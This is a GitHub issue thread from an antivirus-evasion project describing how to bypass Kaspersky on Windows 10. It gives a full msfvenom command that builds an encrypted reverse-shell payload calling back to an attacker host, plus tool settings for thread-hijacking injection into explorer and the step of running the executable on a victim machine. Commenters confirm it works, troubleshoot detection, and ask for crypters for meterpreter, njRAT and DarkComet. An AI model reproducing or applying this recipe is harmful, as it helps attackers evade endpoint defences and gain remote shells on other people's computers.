Ch0pin / AVIator

Antivirus evasion project
GNU General Public License v3.0

Kaspersky AV bypass Test Case #5

Open Ch0pin opened 5 years ago

Ch0pin commented 5 years ago

Bypassing Kaspersky AV on a Win 10 x64 host (TEST CASE)

Getting a shell on a Windows 10 machine running fully updated Kaspersky AV

Target Machine: Windows 10 x64

Create the payload using msfvenom

msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

Use AVIator with the following settings

Target OS architecture: x64

Injection Technique: Thread Hijacking (Shellcode Arch: x64, OS arch: x64)

Target procedure: explorer (leave the default)

Set the listener on the attacker machine

Run the generated exe on the victim machine

pretech86 commented 5 years ago

Thanks for your efforts, it is working well.

Do you have any tool like AVIator but for encrypting exe payloads like meterpreter, and also for encrypting malware servers like njRAT and DarkComet?

Thanks a lot

Ch0pin commented 5 years ago

> Thanks for your efforts, it is working well.
>
> Do you have any tool like AVIator but for encrypting exe payloads like meterpreter, and also for encrypting malware servers like njRAT and DarkComet?
>
> Thanks a lot

Not yet, but this is something that I am for sure going to implement in the very near future.

pretech86 commented 5 years ago

My dear, I tested the windows/meterpreter/reverse/https and tcp payloads; there are no reverse connections.

Also, when I test x64/shell it is working; there is a reverse connection but no meterpreter channel opened.

ghost commented 5 years ago

Once you use meterpreter, the antivirus will detect it. However, shell won't. Maybe encoding the dropped dll is the best way.

pretech86 commented 5 years ago

I used the x64 shell and it worked, but no channel opened although there is a reverse connection?

Ch0pin commented 5 years ago

Make sure you are selecting the right architecture for your shellcode and for your target OS. As pple7000 said, when you use meterpreter the AV will probably detect it and drop the connection as suspicious; if you use a simple shell payload the bypass works fine.... Just press a few enters after the connection is open ;)